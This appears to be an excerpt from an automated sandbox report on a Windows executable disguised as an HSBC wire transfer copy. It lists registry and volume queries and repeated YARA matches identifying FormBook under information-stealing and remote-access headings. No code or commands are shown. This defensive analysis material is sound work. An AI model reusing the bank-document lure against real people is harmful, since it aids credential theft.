Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.HSBC ... Wire Transfer Copy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.HSBC ... Wire Transfer Copy.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000000.287427300.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547820066.0000000003380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346806023.0000000001930000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547165223.0000000002C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.345755031.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.346832554.0000000001960000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290604348.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.322367188.000000000FC1F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.287940636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.547580773.0000000002DD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmp, type: MEMORY